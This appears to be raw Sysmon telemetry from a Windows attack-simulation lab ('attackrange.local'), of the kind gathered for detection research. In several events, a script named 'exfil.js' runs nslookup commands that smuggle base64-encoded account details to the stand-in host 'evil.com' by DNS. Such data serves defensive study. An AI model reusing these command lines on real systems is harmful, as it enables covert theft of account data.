14:21:26.203{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.203{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.203{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.203{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.203{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-D542-000000005F02}5044C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.203{2E1864BB-18E6-629A-D342-000000005F02}78806672C:\Windows\system32\cmd.exe{2E1864BB-18E6-629A-D542-000000005F02}5044C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.215{2E1864BB-18E6-629A-D542-000000005F02}5044C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E6-629A-D342-000000005F02}7880C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhzk.tmp 2>&1 10341000x8000000000000000206885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.188{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-D442-000000005F02}4284C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.188{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-D442-000000005F02}4284C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.188{2E1864BB-18E6-629A-D442-000000005F02}42845992C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-D342-000000005F02}7880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000206882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.188{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=551BC0290F361E78A26684FAD603519A,SHA256=971D4F0A8BA53EF779634A8A40E3EBA2AEA334A8F2DC470BCCCF211EC8C2CA7D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.188{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-D442-000000005F02}4284C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.172{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.172{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.172{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.172{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.172{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-D342-000000005F02}7880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.172{2E1864BB-18E0-629A-6742-000000005F02}39765164C:\Windows\System32\WScript.exe{2E1864BB-18E6-629A-D342-000000005F02}7880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.181{2E1864BB-18E6-629A-D342-000000005F02}7880C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhzk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.172{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlylax.tmpMD5=FA64F29A2105005DB944F49BBF99C790,SHA256=AFC24D0EC0C7AAB04F6CC9902001B05F5184E11791617287F2A4C4C94A76A48D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.150{2E1864BB-18E6-629A-D142-000000005F02}51286616C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-D242-000000005F02}7340C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.150{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.150{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.150{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.150{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-D242-000000005F02}7340C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.150{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.150{2E1864BB-18E6-629A-D042-000000005F02}70087044C:\Windows\system32\cmd.exe{2E1864BB-18E6-629A-D242-000000005F02}7340C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.156{2E1864BB-18E6-629A-D242-000000005F02}7340C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E6-629A-D042-000000005F02}7008C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlylax.tmp 2>&1 10341000x8000000000000000206864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.135{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-D142-000000005F02}5128C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.135{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E6-629A-D142-000000005F02}5128C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.135{2E1864BB-18E6-629A-D142-000000005F02}51286616C:\Windows\system32\conhost.exe{2E1864BB-18E6-629A-D042-000000005F02}7008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.119{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E6-629A-D142-000000005F02}5128C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 